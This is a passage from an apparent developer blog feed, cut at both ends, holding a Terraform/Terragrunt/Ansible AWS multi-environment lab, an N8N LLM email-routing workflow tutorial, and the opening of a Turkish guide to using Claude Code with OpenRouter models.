class="p">}</span> <span class="nx">variable</span> <span class="s2">"vpc_cidr"</span> <span class="p">{</span> <span class="nx">type</span> <span class="p">=</span> <span class="nx">string</span> <span class="p">}</span> <span class="nx">variable</span> <span class="s2">"instance_type"</span> <span class="p">{</span> <span class="nx">type</span> <span class="p">=</span> <span class="nx">string</span> <span class="p">}</span> <span class="nx">variable</span> <span class="s2">"key_name"</span> <span class="p">{</span> <span class="nx">type</span> <span class="p">=</span> <span class="nx">string</span> <span class="nx">default</span> <span class="p">=</span> <span class="s2">"terraform-lab-key"</span> <span class="p">}</span> <span class="nx">variable</span> <span class="s2">"region"</span> <span class="p">{</span> <span class="nx">type</span> <span class="p">=</span> <span class="nx">string</span> <span class="nx">default</span> <span class="p">=</span> <span class="s2">"eu-central-1"</span> <span class="p">}</span> <span class="nx">module</span> <span class="s2">"vpc"</span> <span class="p">{</span> <span class="nx">source</span> <span class="p">=</span> <span class="s2">"../modules/vpc"</span> <span class="nx">vpc_cidr</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">vpc_cidr</span> <span class="nx">environment</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">environment</span> <span class="p">}</span> <span class="nx">module</span> <span class="s2">"sg"</span> <span class="p">{</span> <span class="nx">source</span> <span class="p">=</span> <span class="s2">"../modules/sg"</span> <span class="nx">vpc_id</span> <span class="p">=</span> <span class="nx">module</span><span class="p">.</span><span class="nx">vpc</span><span class="p">.</span><span class="nx">vpc_id</span> <span class="nx">environment</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">environment</span> <span class="p">}</span> <span class="nx">module</span> <span class="s2">"ec2"</span> <span class="p">{</span> <span class="nx">source</span> <span class="p">=</span> <span class="s2">"../modules/ec2"</span> <span class="nx">instance_type</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">instance_type</span> <span class="nx">environment</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">environment</span> <span class="nx">subnet_id</span> <span class="p">=</span> <span class="nx">module</span><span class="p">.</span><span class="nx">vpc</span><span class="p">.</span><span class="nx">subnet_id</span> <span class="nx">sg_id</span> <span class="p">=</span> <span class="nx">module</span><span class="p">.</span><span class="nx">sg</span><span class="p">.</span><span class="nx">sg_id</span> <span class="nx">key_name</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">key_name</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"null_resource"</span> <span class="s2">"ansible_provision"</span> <span class="p">{</span> <span class="nx">depends_on</span> <span class="p">=</span> <span class="p">[</span><span class="nx">module</span><span class="p">.</span><span class="nx">ec2</span><span class="p">]</span> <span class="nx">triggers</span> <span class="p">=</span> <span class="p">{</span> <span class="nx">instance_id</span> <span class="p">=</span> <span class="nx">module</span><span class="p">.</span><span class="nx">ec2</span><span class="p">.</span><span class="nx">instance_id</span> <span class="p">}</span> <span class="nx">provisioner</span> <span class="s2">"local-exec"</span> <span class="p">{</span> <span class="nx">command</span> <span class="p">=</span> <span class="o">&lt;&lt;-</span><span class="no">EOT</span><span class="sh"> echo "Waiting for instance to be ready..." sleep 30 cd /path/to/ansible &amp;&amp; \ ansible-playbook playbooks/provision.yml -e "target_env=${var.environment}" </span><span class="no"> EOT </span> <span class="p">}</span> <span class="p">}</span> <span class="nx">output</span> <span class="s2">"instance_id"</span> <span class="p">{</span> <span class="nx">value</span> <span class="p">=</span> <span class="nx">module</span><span class="p">.</span><span class="nx">ec2</span><span class="p">.</span><span class="nx">instance_id</span> <span class="p">}</span> <span class="nx">output</span> <span class="s2">"public_ip"</span> <span class="p">{</span> <span class="nx">value</span> <span class="p">=</span> <span class="nx">module</span><span class="p">.</span><span class="nx">ec2</span><span class="p">.</span><span class="nx">public_ip</span> <span class="p">}</span> <span class="nx">output</span> <span class="s2">"vpc_id"</span> <span class="p">{</span> <span class="nx">value</span> <span class="p">=</span> <span class="nx">module</span><span class="p">.</span><span class="nx">vpc</span><span class="p">.</span><span class="nx">vpc_id</span> <span class="p">}</span> </code></pre> </div> <p>Notice that <code>_base/main.tf</code> has no hardcoded values — no instance type, no CIDR block, no environment name. Everything comes from outside. This is what makes it reusable across environments.</p> <h2> Step 3: Terragrunt — Solving the Multi-Environment Problem </h2> <p>Terragrunt is a thin wrapper around Terraform. It doesn't replace Terraform — it just removes the need to duplicate <code>main.tf</code> across environments by injecting environment-specific values at runtime.</p> <p>Think of <code>_base/main.tf</code> as a function. Terragrunt calls that function with different arguments for each environment.</p> <h3> Root config </h3> <p><code>live/terragrunt.hcl</code> is written once and inherited by all environments:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="nx">locals</span> <span class="p">{</span> <span class="nx">env</span> <span class="p">=</span> <span class="nx">basename</span><span class="p">(</span><span class="nx">get_terragrunt_dir</span><span class="p">())</span> <span class="c1"># get_terragrunt_dir() returns the current directory path</span> <span class="c1"># basename() extracts just the last segment: "dev", "staging", or "prod"</span> <span class="c1"># so env is automatically set from the folder name — no hardcoding needed</span> <span class="p">}</span> <span class="nx">remote_state</span> <span class="p">{</span> <span class="nx">backend</span> <span class="p">=</span> <span class="s2">"s3"</span> <span class="nx">config</span> <span class="p">=</span> <span class="p">{</span> <span class="nx">bucket</span> <span class="p">=</span> <span class="s2">"your-tfstate-bucket"</span> <span class="nx">key</span> <span class="p">=</span> <span class="s2">"${local.env}/terraform.tfstate"</span> <span class="nx">region</span> <span class="p">=</span> <span class="s2">"eu-central-1"</span> <span class="nx">encrypt</span> <span class="p">=</span> <span class="kc">true</span> <span class="nx">dynamodb_table</span> <span class="p">=</span> <span class="s2">"terraform-locks"</span> <span class="p">}</span> <span class="nx">generate</span> <span class="p">=</span> <span class="p">{</span> <span class="nx">path</span> <span class="p">=</span> <span class="s2">"backend.tf"</span> <span class="nx">if_exists</span> <span class="p">=</span> <span class="s2">"overwrite_terragrunt"</span> <span class="c1"># backend.tf is generated automatically before every apply</span> <span class="c1"># you never write it manually</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <p>The <code>key</code> field is the critical part. When you run from <code>live/dev</code>, <code>local.env</code> becomes <code>"dev"</code>, so the state is saved to <code>dev/terraform.tfstate</code>. From <code>live/prod</code>, it goes to <code>prod/terraform.tfstate</code>. State isolation is automatic.</p> <h3> Per-environment config </h3> <p>Each environment only contains what's different — the input values:</p> <p><strong><code>live/dev/terragrunt.hcl</code></strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="nx">include</span> <span class="s2">"root"</span> <span class="p">{</span> <span class="nx">path</span> <span class="p">=</span> <span class="nx">find_in_parent_folders</span><span class="p">()</span> <span class="c1"># inherits everything from live/terragrunt.hcl</span> <span class="p">}</span> <span class="nx">terraform</span> <span class="p">{</span> <span class="nx">source</span> <span class="p">=</span> <span class="s2">"../../_base"</span> <span class="c1"># points to the shared main.tf</span> <span class="p">}</span> <span class="nx">inputs</span> <span class="err">=</span> <span class="p">{</span> <span class="nx">environment</span> <span class="p">=</span> <span class="s2">"dev"</span> <span class="nx">vpc_cidr</span> <span class="p">=</span> <span class="s2">"10.0.0.0/16"</span> <span class="nx">instance_type</span> <span class="p">=</span> <span class="s2">"t3.micro"</span> <span class="nx">key_name</span> <span class="p">=</span> <span class="s2">"terraform-lab-key"</span> <span class="p">}</span> </code></pre> </div> <p><strong><code>live/prod/terragrunt.hcl</code></strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="nx">include</span> <span class="s2">"root"</span> <span class="p">{</span> <span class="nx">path</span> <span class="p">=</span> <span class="nx">find_in_parent_folders</span><span class="p">()</span> <span class="p">}</span> <span class="nx">terraform</span> <span class="p">{</span> <span class="nx">source</span> <span class="p">=</span> <span class="s2">"../../_base"</span> <span class="c1"># same main.tf</span> <span class="p">}</span> <span class="nx">inputs</span> <span class="err">=</span> <span class="p">{</span> <span class="nx">environment</span> <span class="p">=</span> <span class="s2">"prod"</span> <span class="nx">vpc_cidr</span> <span class="p">=</span> <span class="s2">"10.2.0.0/16"</span> <span class="nx">instance_type</span> <span class="p">=</span> <span class="s2">"t3.medium"</span> <span class="c1"># only the values differ</span> <span class="nx">key_name</span> <span class="p">=</span> <span class="s2">"terraform-lab-key"</span> <span class="p">}</span> </code></pre> </div> <p>To deploy:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Deploy only dev</span> <span class="nb">cd </span>live/dev <span class="o">&amp;&amp;</span> terragrunt apply <span class="c"># Plan all environments at once</span> <span class="nb">cd </span>live <span class="o">&amp;&amp;</span> terragrunt run-all plan <span class="c"># Apply all environments at once</span> <span class="nb">cd </span>live <span class="o">&amp;&amp;</span> terragrunt run-all apply </code></pre> </div> <h2> Step 4: Ansible — Post-Provisioning Configuration </h2> <p>Terraform answers the question: <em>"Does this EC2 instance exist?"</em></p> <p>Ansible answers the question: <em>"Is nginx installed on that instance and configured correctly?"</em></p> <p>These are two different problems. Terraform manages <strong>infrastructure state</strong>. Ansible manages <strong>configuration state</strong>. You need both.</p> <h3> Dynamic inventory </h3> <p>Instead of hardcoding IP addresses, Ansible discovers instances by their AWS tags:</p> <p><strong><code>ansible/inventory/aws_ec2.yml</code></strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">plugin</span><span class="pi">:</span> <span class="s">amazon.aws.aws_ec2</span> <span class="na">regions</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">eu-central-1</span> <span class="na">filters</span><span class="pi">:</span> <span class="na">tag:ManagedBy</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">terraform</span> <span class="na">instance-state-name</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">running</span> <span class="na">keyed_groups</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">key</span><span class="pi">:</span> <span class="s">tags.Environment</span> <span class="na">prefix</span><span class="pi">:</span> <span class="s">env</span> <span class="na">separator</span><span class="pi">:</span> <span class="s2">"</span><span class="s">_"</span> <span class="na">hostnames</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">tag:Name</span> <span class="pi">-</span> <span class="s">public-ip-address</span> <span class="na">compose</span><span class="pi">:</span> <span class="na">ansible_host</span><span class="pi">:</span> <span class="s">public_ip_address</span> <span class="na">environment</span><span class="pi">:</span> <span class="s">tags.Environment</span> </code></pre> </div> <p>Any running instance tagged with <code>ManagedBy: terraform</code> is automatically discovered. Instances are grouped by their <code>Environment</code> tag — so <code>dev</code> instances land in the <code>env_dev</code> group, <code>prod</code> in <code>env_prod</code>, and so on. Even if the IP address changes after a destroy/apply cycle, the inventory stays correct.</p> <h3> Roles </h3> <p><strong><code>ansible/roles/common/tasks/main.yml</code></strong> — runs on every instance:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="nn">---</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Update all packages</span> <span class="na">ansible.builtin.dnf</span><span class="pi">:</span> <span class="na">name</span><span class="pi">:</span> <span class="s2">"</span><span class="s">*"</span> <span class="na">state</span><span class="pi">:</span> <span class="s">latest</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Install base tools</span> <span class="na">ansible.builtin.dnf</span><span class="pi">:</span> <span class="na">name</span><span class="pi">:</span> <span class="pi">[</span><span class="nv">git</span><span class="pi">,</span> <span class="nv">htop</span><span class="pi">,</span> <span class="nv">vim</span><span class="pi">,</span> <span class="nv">wget</span><span class="pi">]</span> <span class="na">state</span><span class="pi">:</span> <span class="s">present</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Create deploy user</span> <span class="na">ansible.builtin.user</span><span class="pi">:</span> <span class="na">name</span><span class="pi">:</span> <span class="s">deploy</span> <span class="na">shell</span><span class="pi">:</span> <span class="s">/bin/bash</span> <span class="na">groups</span><span class="pi">:</span> <span class="s">wheel</span> <span class="na">append</span><span class="pi">:</span> <span class="s">yes</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Grant deploy user sudo access</span> <span class="na">ansible.builtin.copy</span><span class="pi">:</span> <span class="na">dest</span><span class="pi">:</span> <span class="s">/etc/sudoers.d/deploy</span> <span class="na">content</span><span class="pi">:</span> <span class="s2">"</span><span class="s">deploy</span><span class="nv"> </span><span class="s">ALL=(ALL)</span><span class="nv"> </span><span class="s">NOPASSWD:ALL"</span> <span class="na">mode</span><span class="pi">:</span> <span class="s2">"</span><span class="s">0440"</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Set timezone</span> <span class="na">ansible.builtin.timezone</span><span class="pi">:</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Europe/Istanbul</span> </code></pre> </div> <p><strong><code>ansible/roles/webserver/tasks/main.yml</code></strong> — installs and configures nginx:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="nn">---</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Install nginx</span> <span class="na">ansible.builtin.dnf</span><span class="pi">:</span> <span class="na">name</span><span class="pi">:</span> <span class="s">nginx</span> <span class="na">state</span><span class="pi">:</span> <span class="s">present</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Start and enable nginx</span> <span class="na">ansible.builtin.systemd</span><span class="pi">:</span> <span class="na">name</span><span class="pi">:</span> <span class="s">nginx</span> <span class="na">state</span><span class="pi">:</span> <span class="s">started</span> <span class="na">enabled</span><span class="pi">:</span> <span class="s">yes</span> <span class="na">daemon_reload</span><span class="pi">:</span> <span class="s">yes</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Create environment-specific index.html</span> <span class="na">ansible.builtin.copy</span><span class="pi">:</span> <span class="na">dest</span><span class="pi">:</span> <span class="s">/usr/share/nginx/html/index.html</span> <span class="na">content</span><span class="pi">:</span> <span class="pi">|</span> <span class="s">&lt;h1&gt;{{ app_environment }} environment&lt;/h1&gt;</span> <span class="s">&lt;p&gt;Instance: {{ ansible_facts['hostname'] }}&lt;/p&gt;</span> <span class="s">&lt;p&gt;IP: {{ ansible_facts['default_ipv4']['address'] }}&lt;/p&gt;</span> <span class="na">mode</span><span class="pi">:</span> <span class="s2">"</span><span class="s">0644"</span> <span class="na">notify</span><span class="pi">:</span> <span class="s">nginx restart</span> </code></pre> </div> <h3> Playbook </h3> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="nn">---</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Instance provisioning</span> <span class="na">hosts</span><span class="pi">:</span> <span class="s2">"</span><span class="s">env_{{</span><span class="nv"> </span><span class="s">target_env</span><span class="nv"> </span><span class="s">}}"</span> <span class="na">become</span><span class="pi">:</span> <span class="kc">true</span> <span class="na">vars</span><span class="pi">:</span> <span class="na">app_environment</span><span class="pi">:</span> <span class="s2">"</span><span class="s">{{</span><span class="nv"> </span><span class="s">tags.Environment</span><span class="nv"> </span><span class="s">}}"</span> <span class="na">roles</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">common</span> <span class="pi">-</span> <span class="s">webserver</span> </code></pre> </div> <p>Run against a specific environment:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Only dev</span> ansible-playbook playbooks/provision.yml <span class="nt">-e</span> <span class="s2">"target_env=dev"</span> <span class="c"># Only prod</span> ansible-playbook playbooks/provision.yml <span class="nt">-e</span> <span class="s2">"target_env=prod"</span> </code></pre> </div> <h3> Idempotency test </h3> <p>One of Ansible's core properties is idempotency — running the same playbook twice should produce the same result. The second run should show <code>changed=0</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># First run</span> ansible-playbook playbooks/provision.yml <span class="nt">-e</span> <span class="s2">"target_env=dev"</span> <span class="c"># → ok=10 changed=8 failed=0</span> <span class="c"># Second run — nothing changes</span> ansible-playbook playbooks/provision.yml <span class="nt">-e</span> <span class="s2">"target_env=dev"</span> <span class="c"># → ok=10 changed=0 failed=0</span> </code></pre> </div> <p><code>changed=0</code> on the second run confirms idempotency is working.</p> <h2> Step 5: Connecting Everything — One Command to Rule Them All </h2> <p>With <code>null_resource</code> in <code>_base/main.tf</code>, running <code>terragrunt apply</code> automatically triggers Ansible after the EC2 instance is ready:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>terragrunt apply ↓ VPC created ↓ Security Group created ↓ EC2 instance running ↓ null_resource triggers (depends_on = [module.ec2]) ↓ sleep 30 (wait for SSH to be ready) ↓ ansible-playbook runs automatically ↓ nginx installed, configured, running </code></pre> </div> <p>From a single command, you get a fully provisioned and configured server.</p> <h2> Step 6: Proving It Works — IAM Isolation &amp; Drift Testing </h2> <h3> IAM isolation </h3> <p>A dev engineer should not be able to touch prod state files. We enforce this with IAM policies:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"Effect"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Allow"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Action"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="s2">"s3:GetObject"</span><span class="p">,</span><span class="w"> </span><span class="s2">"s3:PutObject"</span><span class="p">,</span><span class="w"> </span><span class="s2">"s3:DeleteObject"</span><span class="p">],</span><span class="w"> </span><span class="nl">"Resource"</span><span class="p">:</span><span class="w"> </span><span class="s2">"arn:aws:s3:::your-tfstate-bucket/dev/*"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>The dev IAM user can only read/write to <code>dev/*</code> in S3. Attempting to write to <code>prod/*</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">AWS_ACCESS_KEY_ID</span><span class="o">=</span>dev-key <span class="nv">AWS_SECRET_ACCESS_KEY</span><span class="o">=</span>dev-secret <span class="se">\</span> aws s3 <span class="nb">cp </span>test.txt s3://your-tfstate-bucket/prod/test.txt <span class="c"># An error occurred (AccessDenied) when calling the PutObject operation</span> </code></pre> </div> <p>Human error blocked at the policy level.</p> <h3> Drift test </h3> <p>Add a new tag to <code>modules/ec2/main.tf</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="nx">tags</span> <span class="err">=</span> <span class="p">{</span> <span class="nx">Name</span> <span class="p">=</span> <span class="s2">"${var.environment}-server"</span> <span class="nx">Environment</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">environment</span> <span class="nx">ManagedBy</span> <span class="p">=</span> <span class="s2">"terraform"</span> <span class="nx">Project</span> <span class="p">=</span> <span class="s2">"terraform-lab"</span> <span class="c1"># new tag</span> <span class="p">}</span> </code></pre> </div> <p>Run <code>run-all plan</code> to see the change propagated to all three environments simultaneously:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">cd </span>live <span class="o">&amp;&amp;</span> terragrunt run-all plan <span class="c"># Plan: 0 to add, 1 to change, 0 to destroy (dev)</span> <span class="c"># Plan: 0 to add, 1 to change, 0 to destroy (staging)</span> <span class="c"># Plan: 0 to add, 1 to change, 0 to destroy (prod)</span> </code></pre> </div> <p>One file changed. Three environments updated. No manual copying, no risk of forgetting one.</p> <h2> Key Takeaways </h2> <p>After building this from scratch, here's what actually clicked for me:</p> <p><strong>Terraform and Ansible solve different problems.</strong> Terraform manages infrastructure state — "does this resource exist in AWS?" Ansible manages configuration state — "is nginx installed and running on that server?" You need both because provisioning a server and configuring it are fundamentally different concerns.</p> <p><strong>Terragrunt's value isn't magic — it's discipline.</strong> The single <code>_base/main.tf</code> enforces consistency. You can't accidentally configure staging differently from prod because there's only one source of truth. Configuration drift becomes structurally impossible rather than just unlikely.</p> <p><strong>IAM policy is the last line of defense.</strong> Engineers make mistakes. The <code>cd live/prod &amp;&amp; terragrunt apply</code> accident will happen eventually. When it does, the question is whether your infrastructure or your IAM policy catches it first.</p> <p><strong>Idempotency is a property you verify, not assume.</strong> Running the playbook twice and checking for <code>changed=0</code> isn't just a test — it's how you know your automation is actually reliable.</p> <p><em>All code from this lab is available on <a href="https://github.com/tahayagizguler/terraform-ansible-lab" rel="noopener noreferrer">GitHub</a>. If you spot something that could be done better, I'd genuinely love to hear it in the comments.</em></p> terraform ansible devops infrastructure Building an AI-Powered Email Routing Agent with N8N, OpenRouter, and PostgreSQL Taha Yağız Güler Wed, 13 May 2026 12:23:13 +0000 https://dev.to/tahayagizguler/building-an-ai-powered-email-routing-agent-with-n8n-openrouter-and-postgresql-12ga https://dev.to/tahayagizguler/building-an-ai-powered-email-routing-agent-with-n8n-openrouter-and-postgresql-12ga <h1> Building an AI-Powered Email Routing Agent with N8N, OpenRouter, and PostgreSQL </h1> <p>Every company has that one inbox — the shared one everyone ignores until something explodes. Emails pile up, get misrouted, or simply sit there while the wrong person tries to figure out who should handle it.</p> <p>I built an AI agent on N8N that solves this completely. It watches an inbox, reads every incoming email, classifies it using an LLM, routes it to the right team, and logs everything to PostgreSQL — fully automated, no human in the loop.</p> <p>Here's how it works.</p> <h2> The Problem </h2> <p>When customers or internal staff send emails to a shared address, someone has to:</p> <ol> <li>Read the email</li> <li>Decide which team handles it (IT, HR, Finance, Legal...)</li> <li>Forward it manually</li> <li>Hope it doesn't get lost</li> </ol> <p>This is repetitive, error-prone, and doesn't scale. It's also exactly the kind of work AI is good at.</p> <h2> Architecture Overview </h2> <p>The N8N workflow consists of 7 stages:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Gmail Trigger → Prepare Mail Data → LLM Chain (OpenRouter) → JS Response Parser → Switch → Team Gmail Nodes → Merge → PostgreSQL </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsukgrlab8b8gw50fjd56.PNG" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsukgrlab8b8gw50fjd56.PNG" alt=" "></a></p> <h2> Stage 1: Gmail Trigger </h2> <p>The workflow polls the inbox every minute using N8N's Gmail Trigger node. Each new email fires the pipeline automatically.</p> <h2> Stage 2: Prepare Mail Data </h2> <p>Before sending anything to the LLM, a Set node extracts and normalizes the key fields:</p> <ul> <li> <code>sender</code> — name + email address</li> <li> <code>subject</code> — cleaned header</li> <li> <code>content</code> — plain text body</li> <li> <code>date</code> — normalized timestamp</li> <li> <code>mail_id</code> — unique Gmail message ID</li> <li> <code>ai_prompt</code> — formatted string passed to the LLM</li> </ul> <h2> Stage 3: LLM Classification via OpenRouter </h2> <p>This is where the intelligence lives. I used N8N's LangChain LLM Chain node with OpenRouter as the model provider, which lets me swap between models (GPT-4o, Claude, Mistral, etc.) without changing the workflow.</p> <p>The system prompt instructs the model to:</p> <ul> <li>Classify the email into exactly one category: <strong>IT, HR, Finance, or Other</strong> </li> <li>Assign a priority: <strong>High, Medium, or Low</strong> </li> <li>Write a 3-sentence summary in the original language of the email</li> <li>Return a <code>trust_score</code> between 0.0 and 1.0 indicating classification confidence</li> </ul> <p>The output is strict JSON — no markdown, no preamble, no extra fields:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"category"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Finance"</span><span class="p">,</span><span class="w"> </span><span class="nl">"priority"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Medium"</span><span class="p">,</span><span class="w"> </span><span class="nl">"summary"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Invoice #12345 payment is overdue."</span><span class="p">,</span><span class="w"> </span><span class="nl">"trust_score"</span><span class="p">:</span><span class="w"> </span><span class="mf">0.87</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>If <code>trust_score</code> falls below 0.70, the model is instructed to fall back to <code>"Other"</code> rather than make a low-confidence routing decision.</p> <h2> Stage 4: JS Response Parser </h2> <p>LLMs occasionally wrap JSON in markdown code fences even when told not to. The Code node strips any <code></code>`<code>json</code> wrappers, parses the response safely, and handles UTF-8 encoded email headers (a common issue with non-ASCII characters in subjects and sender names).</p> <p>If parsing fails entirely, the node returns a safe fallback object so the workflow never crashes.</p> <h2> Stage 5: Switch → Team Routing </h2> <p>A Switch node reads the <code>category</code> field and routes to one of four Gmail send nodes:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Category</th> <th>Routed To</th> </tr> </thead> <tbody> <tr> <td>IT</td> <td><code>inbox+IT@company.com</code></td> </tr> <tr> <td>HR</td> <td><code>inbox+HR@company.com</code></td> </tr> <tr> <td>Finance</td> <td><code>inbox+FINANCE@company.com</code></td> </tr> <tr> <td>Other</td> <td><code>inbox+OTHER@company.com</code></td> </tr> </tbody> </table></div> <p>Each forwarded email includes a formatted HTML body with sender, subject, date, priority, trust score, AI summary, and the original content — everything the receiving team needs to act immediately.</p> <h2> Stage 6: PostgreSQL Logging </h2> <p>After routing, all four branches merge and every email is logged to a <code>mail_routing</code> table in PostgreSQL with the following schema:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Column</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td><code>mail_id</code></td> <td>Unique Gmail message ID</td> </tr> <tr> <td><code>sender</code></td> <td>From address</td> </tr> <tr> <td><code>subject</code></td> <td>Email subject</td> </tr> <tr> <td><code>date</code></td> <td>Received date</td> </tr> <tr> <td><code>category</code></td> <td>AI-assigned category</td> </tr> <tr> <td><code>priority</code></td> <td>AI-assigned priority</td> </tr> <tr> <td><code>summary</code></td> <td>AI-generated summary</td> </tr> <tr> <td><code>trust_score</code></td> <td>Classification confidence</td> </tr> <tr> <td><code>direct_mail</code></td> <td>Original recipient address</td> </tr> <tr> <td><code>content</code></td> <td>Full email body</td> </tr> </tbody> </table></div> <p>This gives you a full audit trail, filterable by team, priority, or date range — useful for reporting or debugging misroutes.</p> <h2> What I Learned </h2> <p><strong>OpenRouter is a smart choice here.</strong> Routing classification doesn't need GPT-4o — a smaller, cheaper model handles it well. OpenRouter lets you change models with a single config update.</p> <p><strong>Trust score is underrated.</strong> Rather than blindly trusting the classification, having a confidence threshold that falls back to "Other" prevents bad routes for ambiguous emails.</p> <p><strong>UTF-8 decoding is a real issue.</strong> Email headers frequently arrive encoded (e.g. <code>=?UTF-8?B?...?=</code>). You need explicit decoding — N8N doesn't handle this automatically.</p> <p><strong>Merge before DB write.</strong> All four routing branches converge at a Merge node before the PostgreSQL insert. This keeps the logging logic in one place rather than duplicating it across four branches.</p> <h2> What's Next </h2> <p>A few improvements worth adding:</p> <ul> <li> <strong>Confidence-based human escalation</strong> — emails below a trust threshold trigger a Slack message asking a human to confirm routing before forwarding</li> <li> <strong>Reply automation</strong> — auto-acknowledge the sender with an estimated response time based on priority</li> <li> <strong>Dashboard</strong> — a simple Grafana view over the PostgreSQL table to visualize routing patterns and volume by team</li> </ul> <h2> Wrapping Up </h2> <p>This project took less than a day to build and completely eliminates manual email triage for a shared inbox. The combination of N8N's visual workflow engine, OpenRouter's model flexibility, and PostgreSQL's reliability makes for a surprisingly production-ready stack.</p> agents ai automation tutorial Claude Code'un Gücünü, Anthropic API Bağımlılığı Olmadan Ücretsiz Modellerle (OpenRouter) Kullanmak Taha Yağız Güler Mon, 23 Mar 2026 15:40:29 +0000 https://dev.to/tahayagizguler/claude-codeun-gucunu-anthropic-api-bagimliligi-olmadan-ucretsiz-modellerle-openrouter-kullanmak-4fim https://dev.to/tahayagizguler/claude-codeun-gucunu-anthropic-api-bagimliligi-olmadan-ucretsiz-modellerle-openrouter-kullanmak-4fim <blockquote> <p><em>Anthropic aboneliği ödemeden Claude Code'u kullanmak mümkün mü? Evet — ve nasıl yapıldığını adım adım anlatıyorum.</em></p> </blockquote> <h2> Giriş: "Usage Limit Reached" Duvarına Çarpanlar İçin Kaçış Planı </h2> <p>Kritik bir hatayı düzeltmeye çalışıyorsunuz. Derken Claude Code ekrana soğuk bir mesaj atıyor: "Claude usage limit reached".</p> <p>Tanıdık geldi değil mi?</p> <p>Ya da belki şu soruyla uyanıyorsunuz: <em>"Claude Code için aylık $20 ödemek zorunda mıyım? Başka model kullanamaz mıyım?"</em></p> <p><strong>Evet, kullanabilirsin.</strong></p> <p>Claude Code, Anthropic API'sine bağlı bir araç değil. Arka planda hangi URL'ye istek attığını umursamıyor. O URL'yi değiştirirseniz, istekleri istediğiniz modele yönlendirebilirsiniz.</p> <h2> OpenRouter Nedir? </h2> <p>OpenRouter, 400'den fazla yapay zeka modelini tek bir API üzerinden kullanmanızı sağlayan bir platform. Claude, GPT, Gemini, Llama, DeepSeek, Qwen… hepsi orada.</p> <p>Asıl güzelliği ise 39'dan fazla ücretsiz model barındırması. Günlük kotası sınırlı ama geliştirici projeleri, öğrenme ve yan projeler için fazlasıyla yeterli.</p> <h2> Hadi Başlayalım: 5 Dakikada Kurulum </h2> <h3> Adım 1 — Claude Code'u Kurun (henüz yoksa) </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>npm <span class="nb">install</span> <span class="nt">-g</span> @anthropic-ai/claude-code </code></pre> </div> <h3> 2. OpenRouter'da Ücretsiz API Anahtarı Alın </h3> <p><a href="https://openrouter.ai" rel="noopener noreferrer">openrouter.ai</a> adresine gidin, ücretsiz hesap ve sonrasında ayarlar kısmından API Key’inizi oluşturun.</p> <h3> Adım 3 — Ortam 